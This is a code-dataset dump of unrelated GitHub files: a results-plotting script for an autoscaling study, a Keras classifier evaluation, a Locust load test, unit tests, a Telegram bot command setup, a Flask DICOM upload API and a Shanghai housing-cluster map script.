violation_rates[key] = float(violations)/float(count)\n\n\n print(os.path.join(rootdir, subdir, name))\n print('8'*30)\n return mean_cpu, max_cpu, tail_latencies, violation_rates\n\ndef read_data_detailed(rootdir):\n tail_latencies = {}\n\n for _, dirs, _ in os.walk(rootdir):\n for subdir in sorted(dirs, key=lambda x: (len(x), x)):\n key = int(subdir)\n\n # get latency\n single_exp_tail_latencies = []\n\n name = 'hotel_stats_history.csv'\n \n with open(os.path.join(rootdir, subdir, name), 'r') as f:\n lines = f.readlines()\n assert len(lines) > 1\n fields = lines[0].split(',')\n\n # \"Timestamp\",\"User Count\",\"Type\",\"Name\",\"Requests/s\",\"Failures/s\",\"50%\",\"66%\",\"75%\",\"80%\",\"90%\",\"95%\",\"98%\",\"99%\",\"99.9%\",\"99.99%\",\"99.999%\",\"100%\",\"Total Request Count\",\"Total Failure Count\"\n pos = {}\n tail_key = '99%'\n pos[tail_key] = None\n for i, k in enumerate(fields):\n k = k.replace('\\\"', '').strip()\n if k == tail_key:\n pos[tail_key] = i\n\n # TODO: warmup is hard-coded here\n beg = 53\n for line in lines[beg:]:\n data = line.strip().split(',')\n 
single_exp_tail_latencies.append(int(data[pos[tail_key]]))\n\n tail_latencies[key] = single_exp_tail_latencies\n\n return tail_latencies[4000][:41]\n\ndef read_sinan_data(rootdir, hotel=False, name=None):\n if name is None:\n fname = os.path.join(rootdir, 'results.txt')\n else:\n fname = os.path.join(rootdir, name)\n\n mean_cpu = {}\n max_cpu = {}\n tail_latencies = {}\n violation_rates = {}\n counts = {}\n\n with open(fname, 'r') as f:\n for line in f.readlines()[1:]:\n if not line.strip().split():\n break\n vals = line.strip().split()\n key = int(vals[0])\n mean_cpu[key] = float(vals[-2])\n max_cpu[key] = float(vals[-1])\n tail_latencies[key] = float(vals[2])\n violation_rates[key] = float(vals[1])\n counts[key] = 1\n \n return mean_cpu, max_cpu, tail_latencies, violation_rates\n\ndef figure1(data, fname='results.png', title='', ylabel='', ylim=None, plot_QoS=None):\n \n fontsize = 14\n\n\n plt.style.use(['seaborn-whitegrid'])\n matplotlib.rc(\"legend\", frameon=True)\n\n colors = sns.color_palette(palette='colorblind')\n\n fig = plt.figure(figsize=(9,6))\n fig, ax1 = plt.subplots()\n\n if plot_QoS:\n qos_line = plt.axhline(plot_QoS, linestyle='--', color=colors[-1], linewidth=4)\n\n ax1.plot(data, color=colors[1], linewidth=3)\n\n ax1.set_xlabel('Timestep', fontsize=fontsize)\n ax1.set_ylabel(ylabel, color=colors[1])\n ax1.set_ylim((0, 1500))\n ax1.set_xticks(list(range(5,41,5)))\n ax1.tick_params(axis='y', colors=colors[1])\n\n ax2 = ax1.twinx()\n core_allocation = [80 for _ in range(10)]\n core_allocation += [0.5 for _ in range(10)]\n core_allocation += [80 for _ in range(len(data) - len(core_allocation))]\n ax2.plot(core_allocation, color=colors[2], linewidth=3)\n ax2.set_ylabel('Core Allocation', color=colors[2])\n ax2.set_yscale('log')\n ax2.set_ylim((0.1, 100))\n ax2.tick_params(axis='y', colors=colors[2])\n\n\n beta = scipy.stats.beta(2.3,3.5)\n x_axis = [x/100. for x in range(100)]\n x_axis = list(range(9)) + [x * 30. + 10 for x in x_axis]\n beta_samples = [0. for _ in range(9)] + [beta.pdf(x/100.) 
for x in range(100)]\n ax3 = ax1.twinx()\n ax3.set_ylim(-0.1, 2.0)\n ax3.axis('off')\n ax3.plot(x_axis, beta_samples, color=colors[0], linewidth=3)\n\n if title:\n plt.title(title, fontsize=fontsize)\n\n plt.savefig(fname, bbox_inches='tight', dpi=150)\n plt.clf()\n\ndef bar_plot_paper_quality(data, append_mean=False, fname='results.png', title='', ylabel='', hotel=False, ylim=None,\n plot_QoS=None, num_methods=3, transfer=False):\n \n fontsize = 20\n\n plt.style.use(['seaborn-whitegrid'])\n matplotlib.rc(\"font\", size=fontsize)\n\n labels = list(data[0].keys())\n all_data = []\n for d in data:\n single_method_data = []\n for key in labels:\n single_method_data.append(d[key])\n \n if append_mean:\n single_method_data.append(np.mean(single_method_data))\n \n all_data.append(single_method_data)\n \n if append_mean:\n labels += ['Mean']\n columns = [str(x) for x in labels]\n columns[0] += ' U'\n if not transfer:\n rows = ('RECLAIMER', 'Sinan', 'AutoScale',)\n rows = rows[:num_methods]\n else:\n rows = ('Transfer', 'Random Init')\n \n if transfer:\n colors = sns.color_palette(palette='colorblind')[4:6]\n else:\n colors = sns.color_palette(palette='colorblind')\n colors[:3] = colors[:3][::-1]\n\n bar_width = 0.15\n\n # Initialize the vertical-offset for the stacked bar chart.\n index = np.arange(len(labels))\n fig = plt.figure(figsize=(15,6))\n\n cell_text = []\n for idx, d in enumerate(all_data):\n plt.bar(index+bar_width*(idx-((len(all_data)-1)/2)), d, bar_width, color=colors[idx])\n if np.max(d) >= 100:\n cell_text.append(['%1.0f' % (x) for x in d])\n elif np.max(d) >= 10:\n cell_text.append(['%1.1f' % (x) for x in d])\n else:\n cell_text.append(['%1.2f' % (x) for x in d])\n \n bbox = [0.03, -0.35, 0.94, 0.35]\n if hotel:\n bbox = [0.02, -0.35, 0.96, 0.35]\n tab = plt.table(cellText=cell_text,\n rowLabels=rows,\n rowColours=colors,\n colLabels=columns,\n loc='bottom',\n cellLoc='center',\n bbox=bbox\n )\n tab.auto_set_font_size(False)\n tab.set_fontsize(fontsize)\n\n for (row, col), cell in tab.get_celld().items():\n if (row == 0) or (col == -1):\n cell.set_text_props(fontproperties=FontProperties(weight='bold'), fontsize=fontsize)\n\n fig.subplots_adjust(left=0.2, bottom=0.1)\n\n if plot_QoS:\n plt.axhline(plot_QoS, linestyle='--', color=colors[-1])\n\n plt.ylim(ylim)\n plt.ylabel(ylabel, fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xticks([])\n if title:\n plt.title(title, fontsize=fontsize)\n\n fig = plt.gcf()\n plt.savefig(fname, bbox_inches='tight', dpi=150)\n plt.clf()\n\nif __name__=='__main__':\n qos = 500\n\n violation_ylim = (0, 0.042)\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/us/eval_notransformer/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/sinan/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_sinan_data(rootdir, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/conservative/evaluate/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos)\n 
all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='social-mean_cpu.png',\n ylabel='Mean Allocated CPUs')\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='social-max_cpu.png',\n ylabel='Maximum Allocated CPUs')\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='social-tail_latency.png',\n ylabel='Tail Latency (ms)',\n plot_QoS=qos, ylim=(0, qos*1.05))\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='social-violation_rate.png',\n ylabel='Violation Rate', ylim=violation_ylim)\n\n\n ###################### HOTEL ######################\n\n\n qos = 200\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/cpu/hotel/us/eval_noexploit_publish2_nohat/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n rootdir = './results/evaluation_results/cpu/hotel/us/eval_retrain/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=True)\n del_keys = []\n for key, val in mean_cpu.items():\n if int(key) > 3500:\n del_keys.append(key)\n for key in del_keys:\n mean_cpu.pop(key, None)\n max_cpu.pop(key, None)\n tail_latencies.pop(key, None)\n violation_rates.pop(key, None)\n\n\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/hotel/sinan/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_sinan_data(rootdir, hotel=True, name='results8.txt')\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/hotel/conservative/eval_noexploit_publish/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=True)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='hotel-mean_cpu.png',\n ylabel='Mean Allocated CPUs', hotel=True)\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='hotel-max_cpu.png',\n ylabel='Maximum Allocated CPUs', hotel=True)\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='hotel-tail_latency.png',\n ylabel='Tail Latency (ms)', hotel=True, plot_QoS=qos, ylim=(0, qos*1.05))\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='hotel-violation_rate.png',\n ylabel='Violation Rate', hotel=True, ylim=violation_ylim)\n\n ###################### Figure 1 ######################\n\n rootdir = './results/evaluation_results/figure1/sac/gym_dsb-dsb-social-media-v0/locust_results'\n tail_latencies= read_data_detailed(rootdir)\n figure1(tail_latencies, fname=\"figure1.png\", ylabel='Tail Latency (ms)', plot_QoS=200)\n\n ###################### Transfer Hotel -> Social ######################\n\n\n qos = 500\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/transfer/h_to_s_publish2/sac/gym_dsb-dsb-social-media-v0/locust_results'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n 
all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/transfer/baseline2/sac/gym_dsb-dsb-social-media-v0/locust_results'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='transfer-mean_cpu.png',\n ylabel='Mean Allocated CPUs', hotel=True, num_methods=1, transfer=True)\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='transfer-max_cpu.png',\n ylabel='Maximum Allocated CPUs', hotel=True, num_methods=1, transfer=True)\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='transfer-tail_latency.png',\n ylabel='Tail Latency (ms)', hotel=True, plot_QoS=qos, ylim=(0, qos*1.05), num_methods=1, transfer=True)\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='transfer-violation_rate.png',\n ylabel='Violation Rate', hotel=True, ylim=violation_ylim, num_methods=1, transfer=True)","repo_name":"qfettes/reclaimer","sub_path":"DeepRL/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":14891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17994493009","text":"from pathlib import Path\nfrom glob import glob\nimport numpy as np\nimport pandas as pd\n\nfrom skimage.io import imread\nfrom skimage.transform import resize\nimport tensorflow.keras as keras\nfrom tensorflow.keras.layers import (Conv2D, MaxPooling2D, Dense, ReLU, Dropout, \n Flatten, GlobalAveragePooling2D)\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import SGD\nfrom sklearn.metrics import classification_report\n\n\ndef prepare_data(img_path):\n train_paths_F = glob(str(img_path/'aligned/*F/*.jpg'), recursive=True)\n train_paths_M = glob(str(img_path/'aligned/*M/*.jpg'), recursive=True)\n val_paths_F = glob(str(img_path/'valid/*F/*.jpg'), recursive=True)\n val_paths_M = glob(str(img_path/'valid/*M/*.jpg'), recursive=True)\n\n # make train df\n train_df = make_img_df(train_paths_F, train_paths_M)\n val_df = make_img_df(val_paths_F, val_paths_M)\n\n print('Data preparation completed!')\n\n return train_df, val_df\n\n\ndef make_img_df(paths_F, paths_M):\n df_F = pd.DataFrame(paths_F, columns=['fpath'])\n df_F['gender'] = 'f'\n\n df_M = pd.DataFrame(paths_M, columns=['fpath'])\n df_M['gender'] = 'm'\n\n df = pd.concat([df_F, df_M], axis=0)\n df = df.sample(frac=1).reset_index(drop=True)\n\n return df\n\n\nif __name__ == \"__main__\":\n\n img_path = Path('./data/combined/')\n batch_size = 64\n \n # Recreate the exact same model, including weights and optimizer.\n gender_model = keras.models.load_model('gender_cls_model.h5')\n print(gender_model.summary())\n \n # make train/val dataframe\n train_df, val_df = prepare_data(img_path)\n \n # Valid generator\n val_datagen = ImageDataGenerator(data_format='channels_first')\n val_generator = val_datagen.flow_from_dataframe(val_df,\n x_col='fpath',\n y_col='gender',\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n \n # Overall loss and Accuracy\n print('Evaluating model...')\n overall_loss, overall_acc = gender_model.evaluate_generator(val_generator,\n use_multiprocessing=True,\n max_queue_size=10,\n workers=4,\n verbose=1)\n 
print(f'Overall Loss: {round(overall_loss, 3)}, Overall Accuracy: {round(overall_acc, 3)}\\n')\n \n # Class accuracy\n print('Making predictions...')\n val_generator_all = val_datagen.flow_from_dataframe(\n val_df,\n x_col='fpath',\n y_col='gender',\n target_size=(224, 224),\n batch_size=val_df.shape[0],\n class_mode='binary')\n X, y = next(iter(val_generator_all))\n pred = gender_model.predict(X, verbose=1)\n pred = pred.squeeze()\n pred = [1 if p > 0.5 else 0 for p in pred]\n print(classification_report(y, pred, target_names=['Female', 'Male']))","repo_name":"xhan0909/VGGFace_Keras_Implmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10665588080","text":"n = int(input())\n\nnames = list(input() for _ in range(n))\nans = []\n\nfor i in range(n):\n f = names[i][0]\n cnt = 0\n for j in range(n):\n if names[j][0] == f:\n cnt += 1\n if cnt >= 5:\n ans.append(f)\n\nif len(ans) == 0:\n print('PREDAJA')\nelse:\n ans.sort()\n ans = set(ans)\n print(''.join(map(str,ans)))\n\n\n# --------------------------------------------------------------------#\n\nn = int(input())\n\nfirstnames = []\n\nfor i in range(n):\n name = input()\n firstnames.append(name[0])\n\nans = []\n\nfor i in firstnames:\n if firstnames.count(i) >= 5 and i not in ans:\n ans.append(i)\n\nif len(ans) == 0:\n print('PREDAJA')\nelse:\n print(''.join(sorted(ans)))\n","repo_name":"petteloiv/Algorithm","sub_path":"백준/1159_농구경기.py","file_name":"1159_농구경기.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"36487955176","text":"from locust import HttpUser, task, constant_throughput\nimport random\nimport json\n\nclass TestProfileUser(HttpUser):\n wait_time = constant_throughput(50)\n\n @task\n def read_profile(self):\n id = random.randrange(1, 51)\n url = f\"/api/v1/profile/{id}/\"\n with self.client.get(url, catch_response=True) as response:\n print(f'read, {response.status_code}, {url}' )\n\n @task\n def update_profile(self):\n id = random.randrange(1, 51)\n url = f'/api/v1/profile/{id}/'\n data = {\n \"name\": f\"test_{id}\"\n }\n payload = json.dumps(data)\n headers = {'content-type': 'application/json'}\n with self.client.patch(url, headers=headers, json=data, catch_response=True) as response:\n print(f'update, {response.status_code}, {url}' )\n","repo_name":"storemesh/baylog","sub_path":"experiment02/locust/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"16732172852","text":"import cv2\nimport unittest\nfrom dyda_utils import tools\nfrom dyda_utils import tinycv\nfrom dyda_utils import lab_tools\nfrom dyda_utils import dict_comparator\nfrom dyda.components.image_processor import ExtractNonBlackImageProcessor\n\ninput_data = cv2.imread('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/input.jpg')\nref_output = cv2.imread('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/ref_output.bmp')\nref_results = tools.parse_json('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/ref_results.json')\n\nclass TestExtractNonBlackImageProcessor_simple(unittest.TestCase):\n \"\"\" Test simple case. \"\"\"\n\n def test_main_process(self):\n \"\"\" Main process of unit test. 
\"\"\"\n\n # initialization\n comp = ExtractNonBlackImageProcessor()\n\n # run component\n comp.reset()\n comp.input_data = input_data\n comp.run()\n\n # compare output_data with reference\n tar_data = comp.output_data\n img_diff = lab_tools.img_comparator(tar_data, ref_output)\n self.assertEqual(img_diff, 0.0)\n\n # compare results with reference\n tar_data = comp.results\n report = dict_comparator.get_diff(ref_results, tar_data)\n self.assertEqual(report['extra_field'], [])\n self.assertEqual(report['missing_field'], [])\n self.assertEqual(report['mismatch_val'], [])\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"numbersprotocol/dyda","sub_path":"tests/test_ExtractNonBlackImageProcessor.py","file_name":"test_ExtractNonBlackImageProcessor.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"14834999237","text":"from aiogram import Bot\nfrom aiogram.types import BotCommand, BotCommandScopeDefault\n\n\nclass SetCommands:\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.commands = None\n\n async def _default_commands(self):\n \"\"\"Set of commands with description\"\"\"\n await self.bot.set_my_commands([\n BotCommand(command=\"start\", description=\"Старт\"),\n BotCommand(command=\"help\", description=\"Помощь\"),\n ], scope=BotCommandScopeDefault())\n\n async def set_default_commands(self):\n commands = await self.bot.get_my_commands()\n if commands:\n await self.bot.delete_my_commands()\n await self._default_commands()","repo_name":"DonOutcast/crossfit-bot","sub_path":"src/telegram_bot/model/commnad_scope/scopes.py","file_name":"scopes.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"62"} +{"seq_id":"26255251739","text":"import os\nimport shutil\n\nimport SimpleITK as sitk\nfrom numpy.testing import assert_allclose\nfrom picai_prep.dcm2dce import Dicom2DCEConverter\n\n\ndef test_dce_conversion(\n input_dir: str = \"tests/input/dcm/ProstateX\",\n output_dir: str = \"tests/output/mha/ProstateX\",\n output_expected_dir: str = \"tests/output-expected/mha/ProstateX\",\n):\n \"\"\"\n Convert DCE series to single 4D MHA.\n \"\"\"\n # remove output folder (to prevent skipping the conversion)\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n\n # test usage from command line\n archive = Dicom2DCEConverter(\n input_dir=input_dir,\n output_dir=output_dir,\n dcm2dce_settings=\"tests/output/dcm2mha_settings.json\"\n )\n case = archive.cases[-1]\n case.initialize()\n case.extract_metadata()\n case._convert_dce(output_dir)\n\n # compare output\n for patient_id, subject_id in [\n (\"ProstateX-0218\", \"ProstateX-0218_02-18-2011\"),\n ]:\n for modality in [\"dce\"]:\n # construct paths to MHA images\n path_out = os.path.join(output_dir, patient_id, f\"{subject_id}_{modality}.mha\")\n path_out_expected = os.path.join(output_expected_dir, patient_id, f\"{subject_id}_{modality}.mha\")\n\n # sanity check: check if outputs exist\n assert os.path.exists(path_out), f\"Could not find output file at {path_out}!\"\n assert os.path.exists(path_out_expected), f\"Could not find output file at {path_out_expected}!\"\n\n # read images\n img = sitk.GetArrayFromImage(sitk.ReadImage(str(path_out)))\n img_expected = sitk.GetArrayFromImage(sitk.ReadImage(str(path_out_expected)))\n\n # compare images\n assert_allclose(img_expected, 
img)\n","repo_name":"DIAGNijmegen/picai_prep","sub_path":"tests/test_dcm2dce.py","file_name":"test_dcm2dce.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"62"} +{"seq_id":"71942988356","text":"from flask import request, jsonify, send_file\n\nfrom jsonschema import ValidationError\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nimport os\nfrom bson.objectid import ObjectId, InvalidId\n\nfrom api.v1.views import app_views\nfrom api.v1.models import File, UserMongo\nfrom api.v1.models.tables import Patient, Study, Series, Instance, User\nfrom api.v1.utils.zipping import zip_file, extract_and_return_dicom_list\nfrom api.v1.utils.caching import redis_client\nfrom api.v1.utils.database import mongo, db\nfrom api.v1.utils.token import authorize\n\nload_dotenv()\n\nDICOM_FOLDER = os.getenv('DICOM_FOLDER', '/tmp/dicom_files')\n\n\n@app_views.route('/files', methods=['POST'])\n@authorize\ndef upload_file(email):\n \"\"\"Upload dicom files to mongodb\"\"\"\n\n user = User.get_user(email)\n if not user:\n return jsonify({'error': 'User not found'}), 404\n user_mongo = UserMongo.get_user(email)\n \n # Get all dicom files from request\n dicom_files = []\n for file in request.files.values():\n if file.filename.lower().endswith('.zip'):\n dicom_files += extract_and_return_dicom_list(file)\n elif file.filename.lower().endswith('.dcm'):\n dicom_files.append(file)\n if not dicom_files:\n return jsonify({'error': 'No dicom files provided'}), 400\n\n # Create folder if not exists\n os.makedirs(DICOM_FOLDER, exist_ok=True)\n\n # Save files to databases\n try:\n for file in dicom_files:\n\n # save file to mongodb\n data = File.extract_metadata_from_dicom(file)\n if not data:\n return jsonify({'error': 'Invalid file'}), 400\n data['uploader_id'] = str(user_mongo['_id'])\n new_file = File(**data)\n new_file.save()\n \n # save metadata to MySQL\n patient_data = Patient.extract_patient_metadata_from_file(new_file)\n existing_patient = Patient.get_patient_by_patientID(patient_data.get('patientID', ''))\n if existing_patient:\n patient = existing_patient\n else:\n patient = Patient(**patient_data)\n if user not in patient.users:\n patient.users.append(user)\n\n study_data = Study.extract_study_metadata_from_file(new_file)\n existing_study = Study.get_study_by_studyInstanceUID(study_data.get('studyInstanceUID', ''))\n if existing_study:\n study = existing_study\n else:\n study = Study(**study_data)\n study.patient = patient\n if user not in study.users:\n study.users.append(user)\n\n series_data = Series.extract_series_metadata_from_file(new_file)\n existing_series = Series.get_series_by_seriesInstanceUID(series_data.get('seriesInstanceUID', ''))\n if existing_series:\n series = existing_series\n else:\n series = Series(**series_data)\n series.study = study\n if user not in series.users:\n series.users.append(user)\n\n instance_data = Instance.extract_instance_metadata_from_file(new_file)\n existing_instance = Instance.get_instance_by_sopInstanceUID(instance_data.get('sopInstanceUID', ''))\n if existing_instance:\n instance = existing_instance\n else:\n instance = Instance(**instance_data)\n instance.filepath = new_file.filepath\n instance.series = series\n if user not in instance.users:\n instance.users.append(user)\n \n db.session.add_all([patient, study, series, instance])\n db.session.commit()\n \n # Update user\n try:\n update_query = {\n \"$push\": {\n \"files\": new_file.filepath,\n },\n \"$set\": {\n 
\"updated_at\": datetime.now()\n }\n }\n mongo.db.users.update_one({\"email\": email}, update_query)\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # generate or append to a zip\n zip_folder = DICOM_FOLDER + '/zip'\n os.makedirs(zip_folder, exist_ok=True)\n output_zip =f\"{zip_folder}/{new_file.metadata['studyInstanceUID']}.zip\"\n zip_file(output_zip, file)\n redis_client.set(new_file.metadata['seriesInstanceUID'], output_zip)\n\n return jsonify({'message': 'File uploaded successfully'}), 201\n except ValidationError:\n return jsonify({'error': 'Invalid file'}), 400\n\n\n@app_views.route('/files', methods=['GET'])\n@authorize\ndef get_files(email):\n \"\"\"Get all files uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n files = mongo.db.files.find({\"uploader_id\": str(user['_id'])})\n return jsonify([File.serialize_file(file) for file in files]), 200\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files/', methods=['GET'])\n@authorize\ndef get_file(email, file_id):\n \"\"\"Get a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n file = mongo.db.files.find_one({\"_id\": ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n return jsonify(File.serialize_file(file)), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files/', methods=['DELETE'])\n@authorize\ndef delete_file(email, file_id):\n \"\"\"Delete a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n # delete file from mongodb\n file = mongo.db.files.find_one({\"_id\": ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n mongo.db.files.delete_one({\"_id\": ObjectId(file_id)})\n\n # remove file from user's files\n try:\n update_query = {\n \"$pull\": {\n \"files\": file['filepath']\n },\n \"$set\": {\n \"updated_at\": datetime.now()\n }\n }\n mongo.db.users.update_one({\"email\": email}, update_query)\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # remove file from MySQL\n try:\n instance = Instance.get_instance_by_sopInstanceUID(file['metadata']['sopInstanceUID'])\n instance.delete()\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # remove file from filesystem\n try:\n os.remove(file['filepath'])\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n return jsonify({'message': 'File deleted successfully'}), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files//download', methods=['GET'])\n@authorize\ndef download_file(email, file_id):\n \"\"\"Download a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n file = mongo.db.files.find_one({\"_id\": 
ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n return send_file(file['filepath'], as_attachment=True), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n","repo_name":"Sonlowami/DCStore","sub_path":"backend/src/api/v1/views/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":8559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10732932162","text":"import pandas as pd\nfrom pyecharts.charts import *\nfrom pyecharts import options as opts\nfrom pyecharts.globals import SymbolType, ThemeType\n\ndf = pd.read_csv('jieguo.csv', usecols=[2, 4, 5, 8, 21])\ndf['建筑面积'] = df['建筑面积'].apply(lambda a: a[:-1]).astype('float')\n\n# 按照类别进行分组,并计算单价、面积、总价的平均值\nagg_data = df.groupby('类别', as_index=False)['单价', '建筑面积', '总价'].mean().round(2)\n\n# 获取每种类别的数量\ncount_data = df['类别'].value_counts().reset_index()\ncount_data.columns = ['类别', '数量']\n\n# 合并两个聚合结果\nresult = pd.merge(agg_data, count_data, on='类别')\nprint(result)\n\n\n# df.info()\n# print(df.head(5))\ndef category_0():\n category = df.loc[df['类别'] == 0]\n # print(category)\n category0 = category.groupby(['所在区市']).count()['单价']\n x = category0.index.tolist()\n y = category0.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category0)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"0类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第0类分布.html\")\n )\n\n\ndef category_1():\n category = df.loc[df['类别'] == 1]\n # print(category)\n category1 = category.groupby(['所在区市']).count()['单价']\n x = category1.index.tolist()\n y = category1.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category1)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"1类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第1类分布.html\")\n )\n\n\ndef category_2():\n category = df.loc[df['类别'] == 2]\n # print(category)\n category2 = category.groupby(['所在区市']).count()['单价']\n x = category2.index.tolist()\n y = category2.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category2)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"2类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第2类分布.html\")\n )\n\n\ndef category_3():\n category = 